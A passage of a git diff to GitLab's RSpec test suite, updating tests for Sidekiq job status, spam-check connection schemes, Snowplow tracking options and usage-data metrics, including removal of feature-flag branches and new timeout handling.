'completed' do + describe '.completed_jids' do it 'returns the completed job' do expect(described_class.completed_jids(%w(123))).to eq(['123']) end @@ -100,4 +125,46 @@ RSpec.describe Gitlab::SidekiqStatus, :clean_gitlab_redis_queues, :clean_gitlab_ expect(described_class.completed_jids(%w(123 456 789))).to eq(['789']) end end + + describe '.job_status' do + it 'returns an array of boolean values' do + described_class.set('123') + described_class.set('456') + described_class.unset('123') + + expect(described_class.job_status(%w(123 456 789))).to eq([false, true, false]) + end + + it 'handles an empty array' do + expect(described_class.job_status([])).to eq([]) + end + + context 'when log_implicit_sidekiq_status_calls is enabled' do + it 'logs keys that contained the default value' do + described_class.set('123', value: 2) + described_class.set('456') + described_class.set('012') + + expect(Sidekiq.logger).to receive(:info).with(message: described_class::DEFAULT_VALUE_MESSAGE, + keys: [described_class.key_for('456'), described_class.key_for('012')]) + + expect(described_class.job_status(%w(123 456 789 012))).to eq([true, true, false, true]) + end + end + + context 'when log_implicit_sidekiq_status_calls is disabled' do + before do + stub_feature_flags(log_implicit_sidekiq_status_calls: false) + end + + it 'does not perform any logging' do + described_class.set('123', value: 2) + described_class.set('456') + + expect(Sidekiq.logger).not_to receive(:info) + + expect(described_class.job_status(%w(123 456 789))).to eq([true, true, false]) + end + end + end end diff --git a/spec/lib/gitlab/spamcheck/client_spec.rb b/spec/lib/gitlab/spamcheck/client_spec.rb index e542ce455bb..a6e7665569c 100644 --- a/spec/lib/gitlab/spamcheck/client_spec.rb +++ b/spec/lib/gitlab/spamcheck/client_spec.rb @@ -32,6 +32,30 @@ RSpec.describe Gitlab::Spamcheck::Client do stub_application_setting(spam_check_endpoint_url: endpoint) end + describe 'url scheme' do + let(:stub) { 
double(:spamcheck_stub, check_for_spam_issue: response) } + + context 'is tls ' do + let(:endpoint) { 'tls://spamcheck.example.com'} + + it 'uses secure connection' do + expect(Spamcheck::SpamcheckService::Stub).to receive(:new).with(endpoint.sub(%r{^tls://}, ''), + instance_of(GRPC::Core::ChannelCredentials), + anything).and_return(stub) + subject + end + end + + context 'is grpc' do + it 'uses insecure connection' do + expect(Spamcheck::SpamcheckService::Stub).to receive(:new).with(endpoint.sub(%r{^grpc://}, ''), + :this_channel_is_insecure, + anything).and_return(stub) + subject + end + end + end + describe '#issue_spam?' do before do allow_next_instance_of(::Spamcheck::SpamcheckService::Stub) do |instance| diff --git a/spec/lib/gitlab/subscription_portal_spec.rb b/spec/lib/gitlab/subscription_portal_spec.rb index 4be1c85f7c8..627d3bb42c7 100644 --- a/spec/lib/gitlab/subscription_portal_spec.rb +++ b/spec/lib/gitlab/subscription_portal_spec.rb @@ -56,6 +56,7 @@ RSpec.describe ::Gitlab::SubscriptionPortal do where(:method_name, :result) do :default_subscriptions_url | 'https://customers.staging.gitlab.com' :payment_form_url | 'https://customers.staging.gitlab.com/payment_forms/cc_validation' + :registration_validation_form_url | 'https://customers.staging.gitlab.com/payment_forms/cc_registration_validation' :subscriptions_graphql_url | 'https://customers.staging.gitlab.com/graphql' :subscriptions_more_minutes_url | 'https://customers.staging.gitlab.com/buy_pipeline_minutes' :subscriptions_more_storage_url | 'https://customers.staging.gitlab.com/buy_storage' @@ -63,6 +64,7 @@ RSpec.describe ::Gitlab::SubscriptionPortal do :subscriptions_plans_url | 'https://about.gitlab.com/pricing/' :subscriptions_instance_review_url | 'https://customers.staging.gitlab.com/instance_review' :subscriptions_gitlab_plans_url | 'https://customers.staging.gitlab.com/gitlab_plans' + :edit_account_url | 'https://customers.staging.gitlab.com/customers/edit' end with_them do diff --git 
a/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb b/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb index 6004698d092..2b94eaa2db9 100644 --- a/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb +++ b/spec/lib/gitlab/tracking/destinations/snowplow_micro_spec.rb @@ -48,4 +48,24 @@ RSpec.describe Gitlab::Tracking::Destinations::SnowplowMicro do end end end + + describe '#options' do + let_it_be(:group) { create :group } + + before do + stub_env('SNOWPLOW_MICRO_URI', 'http://gdk.test:9091') + end + + it 'includes protocol with the correct value' do + expect(subject.options(group)[:protocol]).to eq 'http' + end + + it 'includes port with the correct value' do + expect(subject.options(group)[:port]).to eq 9091 + end + + it 'includes forceSecureTracker with value false' do + expect(subject.options(group)[:forceSecureTracker]).to eq false + end + end end diff --git a/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb b/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb index f8e73a807c6..06cc2d3800c 100644 --- a/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb +++ b/spec/lib/gitlab/tracking/destinations/snowplow_spec.rb @@ -29,7 +29,7 @@ RSpec.describe Gitlab::Tracking::Destinations::Snowplow do expect(SnowplowTracker::Tracker) .to receive(:new) - .with(emitter, an_instance_of(SnowplowTracker::Subject), Gitlab::Tracking::SNOWPLOW_NAMESPACE, '_abc123_') + .with(emitter, an_instance_of(SnowplowTracker::Subject), described_class::SNOWPLOW_NAMESPACE, '_abc123_') .and_return(tracker) end diff --git a/spec/lib/gitlab/tracking_spec.rb b/spec/lib/gitlab/tracking_spec.rb index 61b2c89ffa1..cd83971aef9 100644 --- a/spec/lib/gitlab/tracking_spec.rb +++ b/spec/lib/gitlab/tracking_spec.rb @@ -13,6 +13,10 @@ RSpec.describe Gitlab::Tracking do described_class.instance_variable_set("@snowplow", nil) end + after do + described_class.instance_variable_set("@snowplow", nil) + end + describe '.options' do shared_examples 'delegates to 
destination' do |klass| before do @@ -63,7 +67,7 @@ RSpec.describe Gitlab::Tracking do appId: '_abc123_', protocol: 'http', port: 9090, - force_secure_tracker: false, + forceSecureTracker: false, formTracking: true, linkClickTracking: true } diff --git a/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb b/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb index 1ae4c9414dd..59b944ac398 100644 --- a/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb +++ b/spec/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll_spec.rb @@ -11,6 +11,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ let(:metric_1) { 'metric_1' } let(:metric_2) { 'metric_2' } let(:metric_names) { [metric_1, metric_2] } + let(:error_rate) { Gitlab::Database::PostgresHll::BatchDistinctCounter::ERROR_RATE } describe 'metric calculations' do before do @@ -38,7 +39,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ end it 'returns the number of unique events in the union of all metrics' do - expect(calculate_metrics_union.round(2)).to eq(3.12) + expect(calculate_metrics_union.round(2)).to be_within(error_rate).percent_of(3) end context 'when there is no aggregated data saved' do @@ -53,7 +54,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ let(:metric_names) { [metric_1] } it 'returns the number of unique events for that metric' do - expect(calculate_metrics_union.round(2)).to eq(2.08) + expect(calculate_metrics_union.round(2)).to be_within(error_rate).percent_of(2) end end end @@ -64,7 +65,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ end it 'returns the number of common events in the intersection of all metrics' do - expect(calculate_metrics_intersections.round(2)).to eq(1.04) + expect(calculate_metrics_intersections.round(2)).to be_within(error_rate).percent_of(1) end context 'when there is no 
aggregated data saved' do @@ -79,7 +80,7 @@ RSpec.describe Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll, :clean_ let(:metric_names) { [metric_1] } it 'returns the number of common/unique events for the intersection of that metric' do - expect(calculate_metrics_intersections.round(2)).to eq(2.08) + expect(calculate_metrics_intersections.round(2)).to be_within(error_rate).percent_of(2) end end end diff --git a/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_configured_to_gitlab_collector_metric_spec.rb b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_configured_to_gitlab_collector_metric_spec.rb new file mode 100644 index 00000000000..c9bc101374f --- /dev/null +++ b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_configured_to_gitlab_collector_metric_spec.rb @@ -0,0 +1,22 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Usage::Metrics::Instrumentations::SnowplowConfiguredToGitlabCollectorMetric do + using RSpec::Parameterized::TableSyntax + + context 'for collector_hostname option' do + where(:collector_hostname, :expected_value) do + 'snowplow.trx.gitlab.net' | true + 'foo.bar.something.net' | false + end + + with_them do + before do + stub_application_setting(snowplow_collector_hostname: collector_hostname) + end + + it_behaves_like 'a correct instrumented metric value', { time_frame: 'none' } + end + end +end diff --git a/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_enabled_metric_spec.rb b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_enabled_metric_spec.rb new file mode 100644 index 00000000000..1e0cdd650fa --- /dev/null +++ b/spec/lib/gitlab/usage/metrics/instrumentations/snowplow_enabled_metric_spec.rb @@ -0,0 +1,22 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Usage::Metrics::Instrumentations::SnowplowEnabledMetric do + using RSpec::Parameterized::TableSyntax + + context 'for snowplow enabled option' do + 
where(:snowplow_enabled, :expected_value) do + true | true + false | false + end + + with_them do + before do + stub_application_setting(snowplow_enabled: snowplow_enabled) + end + + it_behaves_like 'a correct instrumented metric value', { time_frame: 'none' } + end + end +end diff --git a/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb b/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb index dbbc718e147..0f95da74ff9 100644 --- a/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb +++ b/spec/lib/gitlab/usage/metrics/names_suggestions/generator_spec.rb @@ -25,30 +25,10 @@ RSpec.describe Gitlab::Usage::Metrics::NamesSuggestions::Generator do end context 'for count with default column metrics' do - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end - - it_behaves_like 'name suggestion' do - # corresponding metric is collected with ::Gitlab::UsageDataMetrics.suggested_names - let(:key_path) { 'counts.boards' } - let(:name_suggestion) { /count_boards/ } - end - end - - context 'when disabled' do - before do - stub_feature_flags(usage_data_instrumentation: false) - end - - it_behaves_like 'name suggestion' do - # corresponding metric is collected with count(Board) - let(:key_path) { 'counts.boards' } - let(:name_suggestion) { /count_boards/ } - end - end + it_behaves_like 'name suggestion' do + # corresponding metric is collected with count(Board) + let(:key_path) { 'counts.boards' } + let(:name_suggestion) { /count_boards/ } end end diff --git a/spec/lib/gitlab/usage_data_spec.rb b/spec/lib/gitlab/usage_data_spec.rb index cf544c07195..015ecd1671e 100644 --- a/spec/lib/gitlab/usage_data_spec.rb +++ b/spec/lib/gitlab/usage_data_spec.rb @@ -80,12 +80,6 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do end end end - - it 'allows indifferent access' do - allow(::Gitlab::UsageDataCounters::HLLRedisCounter).to 
receive(:unique_events).and_return(1) - expect(subject[:search_unique_visits][:search_unique_visits_for_any_target_monthly]).to eq(1) - expect(subject[:search_unique_visits]['search_unique_visits_for_any_target_monthly']).to eq(1) - end end describe 'usage_activity_by_stage_package' do @@ -205,7 +199,6 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do for_defined_days_back do user = create(:user) user2 = create(:user) - create(:event, author: user) create(:group_member, user: user) create(:authentication_event, user: user, provider: :ldapmain, result: :success) create(:authentication_event, user: user2, provider: :ldapsecondary, result: :success) @@ -214,17 +207,24 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do create(:authentication_event, user: user, provider: :group_saml, result: :failed) end + for_defined_days_back(days: [31, 29, 3]) do + create(:event) + end + + stub_const('Gitlab::Database::PostgresHll::BatchDistinctCounter::DEFAULT_BATCH_SIZE', 1) + stub_const('Gitlab::Database::PostgresHll::BatchDistinctCounter::MIN_REQUIRED_BATCH_SIZE', 0) + expect(described_class.usage_activity_by_stage_manage({})).to include( events: -1, groups: 2, - users_created: 6, + users_created: 10, omniauth_providers: ['google_oauth2'], user_auth_by_provider: { 'group_saml' => 2, 'ldap' => 4, 'standard' => 0, 'two-factor' => 0, 'two-factor-via-u2f-device' => 0, "two-factor-via-webauthn-device" => 0 } ) expect(described_class.usage_activity_by_stage_manage(described_class.monthly_time_range_db_params)).to include( - events: be_within(error_rate).percent_of(1), + events: be_within(error_rate).percent_of(2), groups: 1, - users_created: 3, + users_created: 6, omniauth_providers: ['google_oauth2'], user_auth_by_provider: { 'group_saml' => 1, 'ldap' => 2, 'standard' => 0, 'two-factor' => 0, 'two-factor-via-u2f-device' => 0, "two-factor-via-webauthn-device" => 0 } ) @@ -457,42 +457,16 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do ) end - context 'with 
usage_data_instrumentation feature flag' do - context 'when enabled' do - it 'merges the data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: true) - - for_defined_days_back do - user = create(:user) - project = create(:project, creator: user) - create(:issue, project: project, author: user) - create(:issue, project: project, author: User.support_bot) - end - - expect(described_class.usage_activity_by_stage_plan({})).to include(issues: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(described_class.usage_activity_by_stage_plan(described_class.monthly_time_range_db_params)).to include(issues: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - - uncached_data = described_class.uncached_data - expect(uncached_data[:usage_activity_by_stage][:plan]).to include(issues: 3) - expect(uncached_data[:usage_activity_by_stage_monthly][:plan]).to include(issues: 2) - end + it 'does not merge the data from instrumentation classes' do + for_defined_days_back do + user = create(:user) + project = create(:project, creator: user) + create(:issue, project: project, author: user) + create(:issue, project: project, author: User.support_bot) end - context 'when disabled' do - it 'does not merge the data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: false) - - for_defined_days_back do - user = create(:user) - project = create(:project, creator: user) - create(:issue, project: project, author: user) - create(:issue, project: project, author: User.support_bot) - end - - expect(described_class.usage_activity_by_stage_plan({})).to include(issues: 3) - expect(described_class.usage_activity_by_stage_plan(described_class.monthly_time_range_db_params)).to include(issues: 2) - end - end + expect(described_class.usage_activity_by_stage_plan({})).to include(issues: 3) + expect(described_class.usage_activity_by_stage_plan(described_class.monthly_time_range_db_params)).to include(issues: 2) end end @@ 
-510,53 +484,17 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do deployments: 2, failed_deployments: 2, releases: 2, - successful_deployments: 2 + successful_deployments: 2, + releases_with_milestones: 2 ) expect(described_class.usage_activity_by_stage_release(described_class.monthly_time_range_db_params)).to include( deployments: 1, failed_deployments: 1, releases: 1, - successful_deployments: 1 + successful_deployments: 1, + releases_with_milestones: 1 ) end - - context 'with usage_data_instrumentation feature flag' do - before do - for_defined_days_back do - user = create(:user) - create(:deployment, :failed, user: user) - release = create(:release, author: user) - create(:milestone, project: release.project, releases: [release]) - create(:deployment, :success, user: user) - end - end - - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end - - it 'merges data from instrumentation classes' do - expect(described_class.usage_activity_by_stage_release({})).to include(releases_with_milestones: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(described_class.usage_activity_by_stage_release(described_class.monthly_time_range_db_params)).to include(releases_with_milestones: Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - - uncached_data = described_class.uncached_data - expect(uncached_data[:usage_activity_by_stage][:release]).to include(releases_with_milestones: 2) - expect(uncached_data[:usage_activity_by_stage_monthly][:release]).to include(releases_with_milestones: 1) - end - end - - context 'when disabled' do - before do - stub_feature_flags(usage_data_instrumentation: false) - end - - it 'does not merge data from instrumentation classes' do - expect(described_class.usage_activity_by_stage_release({})).to include(releases_with_milestones: 2) - expect(described_class.usage_activity_by_stage_release(described_class.monthly_time_range_db_params)).to 
include(releases_with_milestones: 1) - end - end - end end describe 'usage_activity_by_stage_verify' do @@ -605,16 +543,15 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do subject { described_class.data } it 'gathers usage data' do - expect(subject.keys).to include(*UsageDataHelpers::USAGE_DATA_KEYS.map(&:to_s)) + expect(subject.keys).to include(*UsageDataHelpers::USAGE_DATA_KEYS) end it 'gathers usage counts', :aggregate_failures do count_data = subject[:counts] expect(count_data[:boards]).to eq(1) expect(count_data[:projects]).to eq(4) - count_keys = UsageDataHelpers::COUNTS_KEYS.map(&:to_s) - expect(count_data.keys).to include(*count_keys) - expect(count_keys - count_data.keys).to be_empty + expect(count_data.keys).to include(*UsageDataHelpers::COUNTS_KEYS) + expect(UsageDataHelpers::COUNTS_KEYS - count_data.keys).to be_empty expect(count_data.values).to all(be_a_kind_of(Integer)) end @@ -699,7 +636,7 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do external_diffs: { enabled: false }, lfs: { enabled: true, object_store: { enabled: false, direct_upload: true, background_upload: false, provider: "AWS" } }, uploads: { enabled: nil, object_store: { enabled: false, direct_upload: true, background_upload: false, provider: "AWS" } }, - packages: { enabled: true, object_store: { enabled: false, direct_upload: false, background_upload: true, provider: "AWS" } } }.with_indifferent_access + packages: { enabled: true, object_store: { enabled: false, direct_upload: false, background_upload: true, provider: "AWS" } } } ) end @@ -747,23 +684,50 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do end end - it 'works when queries time out' do - allow_any_instance_of(ActiveRecord::Relation) - .to receive(:count).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when queries time out' do + let(:metric_method) { :count } + + before do + allow_any_instance_of(ActiveRecord::Relation).to 
receive(metric_method).and_raise(ActiveRecord::StatementInvalid) + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) + end + + context 'with should_raise_for_dev? true' do + let(:should_raise_for_dev) { true } + + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::StatementInvalid) + end + + context 'when metric calls find_in_batches' do + let(:metric_method) { :find_in_batches } + + it 'raises an error for jira_usage' do + expect { described_class.jira_usage }.to raise_error(ActiveRecord::StatementInvalid) + end + end + end + + context 'with should_raise_for_dev? false' do + let(:should_raise_for_dev) { false } + + it 'does not raise an error' do + expect { subject }.not_to raise_error + end - expect { subject }.not_to raise_error + context 'when metric calls find_in_batches' do + let(:metric_method) { :find_in_batches } + + it 'does not raise an error for jira_usage' do + expect { described_class.jira_usage }.not_to raise_error + end + end + end end it 'includes a recording_ce_finished_at timestamp' do expect(subject[:recording_ce_finished_at]).to be_a(Time) end - - it 'jira usage works when queries time out' do - allow_any_instance_of(ActiveRecord::Relation) - .to receive(:find_in_batches).and_raise(ActiveRecord::StatementInvalid.new('')) - - expect { described_class.jira_usage }.not_to raise_error - end end describe '.system_usage_data_monthly' do @@ -873,37 +837,12 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do subject { described_class.license_usage_data } it 'gathers license data' do + expect(subject[:uuid]).to eq(Gitlab::CurrentSettings.uuid) expect(subject[:version]).to eq(Gitlab::VERSION) expect(subject[:installation_type]).to eq('gitlab-development-kit') + expect(subject[:active_user_count]).to eq(User.active.size) expect(subject[:recorded_at]).to be_a(Time) end - - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - it 'merges uuid and 
hostname data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: true) - - expect(subject[:uuid]).to eq(Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(subject[:hostname]).to eq(Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - expect(subject[:active_user_count]).to eq(Gitlab::Utils::UsageData::INSTRUMENTATION_CLASS_FALLBACK) - - uncached_data = described_class.data - expect(uncached_data[:uuid]).to eq(Gitlab::CurrentSettings.uuid) - expect(uncached_data[:hostname]).to eq(Gitlab.config.gitlab.host) - expect(uncached_data[:active_user_count]).to eq(User.active.size) - end - end - - context 'when disabled' do - it 'does not merge uuid and hostname data from instrumentation classes' do - stub_feature_flags(usage_data_instrumentation: false) - - expect(subject[:uuid]).to eq(Gitlab::CurrentSettings.uuid) - expect(subject[:hostname]).to eq(Gitlab.config.gitlab.host) - expect(subject[:active_user_count]).to eq(User.active.size) - end - end - end end context 'when not relying on database records' do @@ -1139,6 +1078,7 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do describe ".system_usage_data_settings" do let(:prometheus_client) { double(Gitlab::PrometheusClient) } + let(:snowplow_gitlab_host?) 
{ Gitlab::CurrentSettings.snowplow_collector_hostname == 'snowplow.trx.gitlab.net' } before do allow(described_class).to receive(:operating_system).and_return('ubuntu-20.04') @@ -1166,51 +1106,34 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do expect(subject[:settings][:gitaly_apdex]).to be_within(0.001).of(0.95) end - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end - - it 'reports collected data categories' do - expected_value = %w[standard subscription operational optional] + it 'reports collected data categories' do + expected_value = %w[standard subscription operational optional] - allow_next_instance_of(ServicePing::PermitDataCategoriesService) do |instance| - expect(instance).to receive(:execute).and_return(expected_value) - end - - expect(described_class.data[:settings][:collected_data_categories]).to eq(expected_value) - end - - it 'gathers service_ping_features_enabled' do - expect(described_class.data[:settings][:service_ping_features_enabled]).to eq(Gitlab::CurrentSettings.usage_ping_features_enabled) - end + allow_next_instance_of(ServicePing::PermitDataCategoriesService) do |instance| + expect(instance).to receive(:execute).and_return(expected_value) end - context 'when disabled' do - before do - stub_feature_flags(usage_data_instrumentation: false) - end - - it 'reports collected data categories' do - expected_value = %w[standard subscription operational optional] - - allow_next_instance_of(ServicePing::PermitDataCategoriesService) do |instance| - expect(instance).to receive(:execute).and_return(expected_value) - end - - expect(subject[:settings][:collected_data_categories]).to eq(expected_value) - end + expect(subject[:settings][:collected_data_categories]).to eq(expected_value) + end - it 'gathers service_ping_features_enabled' do - expect(subject[:settings][:service_ping_features_enabled]).to 
eq(Gitlab::CurrentSettings.usage_ping_features_enabled) - end - end + it 'gathers service_ping_features_enabled' do + expect(subject[:settings][:service_ping_features_enabled]).to eq(Gitlab::CurrentSettings.usage_ping_features_enabled) end it 'gathers user_cap_feature_enabled' do expect(subject[:settings][:user_cap_feature_enabled]).to eq(Gitlab::CurrentSettings.new_user_signups_cap) end + + context 'snowplow stats' do + before do + stub_feature_flags(usage_data_instrumentation: false) + end + + it 'gathers snowplow stats' do + expect(subject[:settings][:snowplow_enabled]).to eq(Gitlab::CurrentSettings.snowplow_enabled?) + expect(subject[:settings][:snowplow_configured_to_gitlab_collector]).to eq(snowplow_gitlab_host?) + end + end end end @@ -1332,6 +1255,9 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do 'i_analytics_cohorts' => 123, 'i_analytics_dev_ops_score' => 123, 'i_analytics_instance_statistics' => 123, + 'p_analytics_ci_cd_deployment_frequency' => 123, + 'p_analytics_ci_cd_lead_time' => 123, + 'p_analytics_ci_cd_pipelines' => 123, 'p_analytics_merge_request' => 123, 'i_analytics_dev_ops_adoption' => 123, 'users_viewing_analytics_group_devops_adoption' => 123, @@ -1402,33 +1328,21 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do let(:categories) { ::Gitlab::UsageDataCounters::HLLRedisCounter.categories } - context 'with redis_hll_tracking feature enabled' do - it 'has all known_events' do - stub_feature_flags(redis_hll_tracking: true) - - expect(subject).to have_key(:redis_hll_counters) + it 'has all known_events' do + expect(subject).to have_key(:redis_hll_counters) - expect(subject[:redis_hll_counters].keys).to match_array(categories) + expect(subject[:redis_hll_counters].keys).to match_array(categories) - categories.each do |category| - keys = ::Gitlab::UsageDataCounters::HLLRedisCounter.events_for_category(category) + categories.each do |category| + keys = ::Gitlab::UsageDataCounters::HLLRedisCounter.events_for_category(category) - 
metrics = keys.map { |key| "#{key}_weekly" } + keys.map { |key| "#{key}_monthly" } + metrics = keys.map { |key| "#{key}_weekly" } + keys.map { |key| "#{key}_monthly" } - if ::Gitlab::UsageDataCounters::HLLRedisCounter::CATEGORIES_FOR_TOTALS.include?(category) - metrics.append("#{category}_total_unique_counts_weekly", "#{category}_total_unique_counts_monthly") - end - - expect(subject[:redis_hll_counters][category].keys).to match_array(metrics) + if ::Gitlab::UsageDataCounters::HLLRedisCounter::CATEGORIES_FOR_TOTALS.include?(category) + metrics.append("#{category}_total_unique_counts_weekly", "#{category}_total_unique_counts_monthly") end - end - end - context 'with redis_hll_tracking disabled' do - it 'does not have redis_hll_tracking key' do - stub_feature_flags(redis_hll_tracking: false) - - expect(subject).not_to have_key(:redis_hll_counters) + expect(subject[:redis_hll_counters][category].keys).to match_array(metrics) end end end @@ -1468,46 +1382,58 @@ RSpec.describe Gitlab::UsageData, :aggregate_failures do context 'when queries time out' do before do - allow_any_instance_of(ActiveRecord::Relation) - .to receive(:count).and_raise(ActiveRecord::StatementInvalid.new('')) + allow_any_instance_of(ActiveRecord::Relation).to receive(:count).and_raise(ActiveRecord::StatementInvalid) + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) end - it 'returns -1 for email campaign data' do - expected_data = { - "in_product_marketing_email_create_0_sent" => -1, - "in_product_marketing_email_create_0_cta_clicked" => -1, - "in_product_marketing_email_create_1_sent" => -1, - "in_product_marketing_email_create_1_cta_clicked" => -1, - "in_product_marketing_email_create_2_sent" => -1, - "in_product_marketing_email_create_2_cta_clicked" => -1, - "in_product_marketing_email_team_short_0_sent" => -1, - "in_product_marketing_email_team_short_0_cta_clicked" => -1, - "in_product_marketing_email_trial_short_0_sent" => -1, - 
"in_product_marketing_email_trial_short_0_cta_clicked" => -1, - "in_product_marketing_email_admin_verify_0_sent" => -1, - "in_product_marketing_email_admin_verify_0_cta_clicked" => -1, - "in_product_marketing_email_verify_0_sent" => -1, - "in_product_marketing_email_verify_0_cta_clicked" => -1, - "in_product_marketing_email_verify_1_sent" => -1, - "in_product_marketing_email_verify_1_cta_clicked" => -1, - "in_product_marketing_email_verify_2_sent" => -1, - "in_product_marketing_email_verify_2_cta_clicked" => -1, - "in_product_marketing_email_trial_0_sent" => -1, - "in_product_marketing_email_trial_0_cta_clicked" => -1, - "in_product_marketing_email_trial_1_sent" => -1, - "in_product_marketing_email_trial_1_cta_clicked" => -1, - "in_product_marketing_email_trial_2_sent" => -1, - "in_product_marketing_email_trial_2_cta_clicked" => -1, - "in_product_marketing_email_team_0_sent" => -1, - "in_product_marketing_email_team_0_cta_clicked" => -1, - "in_product_marketing_email_team_1_sent" => -1, - "in_product_marketing_email_team_1_cta_clicked" => -1, - "in_product_marketing_email_team_2_sent" => -1, - "in_product_marketing_email_team_2_cta_clicked" => -1, - "in_product_marketing_email_experience_0_sent" => -1 - } + context 'with should_raise_for_dev? true' do + let(:should_raise_for_dev) { true } - expect(subject).to eq(expected_data) + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::StatementInvalid) + end + end + + context 'with should_raise_for_dev? 
false' do + let(:should_raise_for_dev) { false } + + it 'returns -1 for email campaign data' do + expected_data = { + "in_product_marketing_email_create_0_sent" => -1, + "in_product_marketing_email_create_0_cta_clicked" => -1, + "in_product_marketing_email_create_1_sent" => -1, + "in_product_marketing_email_create_1_cta_clicked" => -1, + "in_product_marketing_email_create_2_sent" => -1, + "in_product_marketing_email_create_2_cta_clicked" => -1, + "in_product_marketing_email_team_short_0_sent" => -1, + "in_product_marketing_email_team_short_0_cta_clicked" => -1, + "in_product_marketing_email_trial_short_0_sent" => -1, + "in_product_marketing_email_trial_short_0_cta_clicked" => -1, + "in_product_marketing_email_admin_verify_0_sent" => -1, + "in_product_marketing_email_admin_verify_0_cta_clicked" => -1, + "in_product_marketing_email_verify_0_sent" => -1, + "in_product_marketing_email_verify_0_cta_clicked" => -1, + "in_product_marketing_email_verify_1_sent" => -1, + "in_product_marketing_email_verify_1_cta_clicked" => -1, + "in_product_marketing_email_verify_2_sent" => -1, + "in_product_marketing_email_verify_2_cta_clicked" => -1, + "in_product_marketing_email_trial_0_sent" => -1, + "in_product_marketing_email_trial_0_cta_clicked" => -1, + "in_product_marketing_email_trial_1_sent" => -1, + "in_product_marketing_email_trial_1_cta_clicked" => -1, + "in_product_marketing_email_trial_2_sent" => -1, + "in_product_marketing_email_trial_2_cta_clicked" => -1, + "in_product_marketing_email_team_0_sent" => -1, + "in_product_marketing_email_team_0_cta_clicked" => -1, + "in_product_marketing_email_team_1_sent" => -1, + "in_product_marketing_email_team_1_cta_clicked" => -1, + "in_product_marketing_email_team_2_sent" => -1, + "in_product_marketing_email_team_2_cta_clicked" => -1, + "in_product_marketing_email_experience_0_sent" => -1 + } + + expect(subject).to eq(expected_data) + end end end diff --git a/spec/lib/gitlab/utils/usage_data_spec.rb 
b/spec/lib/gitlab/utils/usage_data_spec.rb index e721b28ac29..325ace6fbbf 100644 --- a/spec/lib/gitlab/utils/usage_data_spec.rb +++ b/spec/lib/gitlab/utils/usage_data_spec.rb @@ -5,32 +5,38 @@ require 'spec_helper' RSpec.describe Gitlab::Utils::UsageData do include Database::DatabaseHelpers - describe '#add_metric' do - let(:metric) { 'UuidMetric'} + shared_examples 'failing hardening method' do + before do + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) + stub_const("Gitlab::Utils::UsageData::FALLBACK", fallback) + allow(failing_class).to receive(failing_method).and_raise(ActiveRecord::StatementInvalid) + end - context 'with usage_data_instrumentation feature flag' do - context 'when enabled' do - before do - stub_feature_flags(usage_data_instrumentation: true) - end + context 'with should_raise_for_dev? false' do + let(:should_raise_for_dev) { false } - it 'returns -100 value to be overriden' do - expect(described_class.add_metric(metric)).to eq(-100) - end + it 'returns the fallback' do + expect(subject).to eq(fallback) end + end - context 'when disabled' do - before do 